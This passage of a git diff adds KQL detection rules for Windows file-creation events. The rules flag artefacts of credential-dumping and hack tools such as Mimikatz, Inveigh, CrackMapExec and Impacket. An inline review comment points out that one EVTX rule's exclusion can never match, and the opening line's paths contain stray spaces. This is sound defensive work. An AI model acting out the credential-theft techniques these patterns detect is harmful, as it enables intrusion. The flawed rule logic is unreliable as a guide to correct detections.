+| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
new file mode 100644
index 00000000..b8db3552
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
@@ -0,0 +1,12 @@
+// Title: DPAPI Backup Keys And Certificate Export Activity IOC
+// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, attack.t1552.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql
new file mode 100644
index 00000000..fccf31b5
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql
@@ -0,0 +1,10 @@
+// Title: Drop Binaries Into Spool Drivers Color Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: medium
+// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql
new file mode 100644
index 00000000..e03bf1a6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql
@@ -0,0 +1,12 @@
+// Title: Dynamic CSharp Compile Artefact
+// Author: frack113
+// Date: 2022-01-09
+// Level: low
+// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
+// Certain processes are not typically observed compiling C# code, but can do so without touching disk.
+// This can be used to unpack a payload for execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+
+DeviceFileEvents
+| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql
new file mode 100644
index 00000000..2d878958
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql
@@ -0,0 +1,15 @@
+// Title: EVTX Created In Uncommon Location
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
+// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
+// Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Administrator or backup activity
+// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql
new file mode 100644
index 00000000..676a4a8b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql
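Review bot: The first exclusion branch of the `where` clause can never match: it requires `FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\"` while the outer condition already requires `FolderPath endswith ".evtx"`, so the container base-image logs under `C:\ProgramData\Microsoft\Windows\Containers\BaseImages\` that the branch is meant to exclude will still alert. The intended test is presumably a substring match, `FolderPath contains "\\Windows\\System32\\winevt\\Logs\\"`. If the Sigma source uses a `contains` modifier here, the converter is mapping that modifier to `endswith` and other generated rules may be affected, which would make this a helper.py issue rather than a per-file fix.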
@@ -0,0 +1,10 @@
+// Title: File Creation In Suspicious Directory By Msdt.EXE
+// Author: Vadim Varganov, Florian Roth (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql
new file mode 100644
index 00000000..3b10723c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql
@@ -0,0 +1,10 @@
+// Title: File With Uncommon Extension Created By An Office Application
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the creation of files with an executable or script extension by an Office application.
+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.execution
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql
new file mode 100644
index 00000000..cc19cbbc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql
@@ -0,0 +1,13 @@
+// Title: Files With System DLL Name In Unsuspected Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
+// It is highly recommended to perform an initial baseline before using this rule in production.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - Third party software might bundle specific versions of system DLLs.
+
+DeviceFileEvents
+| where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql
new file mode 100644
index 00000000..2867167c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql
@@ -0,0 +1,14 @@
+// Title: Files With System Process Name In Unsuspected Locations
+// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-26
+// Level: medium
+// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
+// It is highly recommended to perform an initial baseline before using this rule in production.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - System processes copied outside their default folders for testing purposes
+// - Third party software naming their software with the same names as the processes mentioned here
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or ((InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\SysWOW64\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql
new file mode 100644
index 00000000..abb5b837
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql
@@ -0,0 +1,10 @@
+// Title: GatherNetworkInfo.VBS Reconnaissance Script Output
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql
new file mode 100644
index 00000000..68d12ee8
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql
@@ -0,0 +1,14 @@
+// Title: GoToAssist Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql
new file mode 100644
index 00000000..44253237
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects file creation events with filename patterns used by CrackMapExec.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql
new file mode 100644
index 00000000..9c78eb72
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Default File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
new file mode 100644
index 00000000..677c2742
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Impacket File Indicators
+// Author: The DFIR Report, IrishDeath
+// Date: 2025-05-19
+// Level: high
+// Description: Detects file creation events with filename patterns used by Impacket.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
new file mode 100644
index 00000000..fbb12d87
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Inveigh Execution Artefacts
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the presence and execution of Inveigh via dropped artefacts
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
new file mode 100644
index 00000000..b4b1fb24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Mimikatz Kirbi File Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE
+// Date: 2021-11-08
+// Level: critical
+// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
new file mode 100644
index 00000000..c040e029
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - NPPSpy Hacktool Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceFileEvents
+| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
new file mode 100644
index 00000000..c0800897
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
+// Author: SecurityAura
+// Date: 2022-11-16
+// Level: high
+// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
new file mode 100644
index 00000000..4a003dab
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
@@ -0,0 +1,14 @@
+// Title: HackTool - Powerup Write Hijack DLL
+// Author: Subhash Popuri (@pbssubhash)
+// Date: 2021-08-21
+// Level: high
+// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
+// In it's default mode, it builds a self deleting .bat file which executes malicious command.
+// The detection rule relies on creation of the malicious bat file (debug.bat by default).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Any powershell script that creates bat files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
new file mode 100644
index 00000000..37d91a8b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - QuarksPwDump Dump File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-10
+// Level: critical
+// Description: Detects a dump file written by QuarksPwDump password dumper
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
new file mode 100644
index 00000000..77484182
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
new file mode 100644
index 00000000..9b37a669
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Dump Indicator
+// Author: Markus Neis
+// Date: 2018-07-24
+// Level: high
+// Description: Detects default lsass dump filename generated by SafetyKatz.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate files with similar filename structure
+
+DeviceFileEvents
+| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
new file mode 100644
index 00000000..16e14045
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Typical HiveNightmare SAM File Export
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-23
+// Level: high
+// Description: Detects files written by the different tools that exploit HiveNightmare
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934
+// False Positives:
+// - Files that accidentally contain these strings
+
+DeviceFileEvents
+| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
new file mode 100644
index 00000000..120709f6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
@@ -0,0 +1,12 @@
+// Title: Hijack Legit RDP Session to Move Laterally
+// Author: Samir Bousseaden
+// Date: 2019-02-21
+// Level: high
+// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
new file mode 100644
index 00000000..1d275f65
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
@@ -0,0 +1,10 @@
+// Title: Installation of TeamViewer Desktop
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: TeamViewer_Desktop.exe is create during install
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\TeamViewer_Desktop.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
new file mode 100644
index 00000000..c875e914
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
@@ -0,0 +1,12 @@
+// Title: ISO File Created Within Temp Folders
+// Author: @sam0x90
+// Date: 2022-07-30
+// Level: high
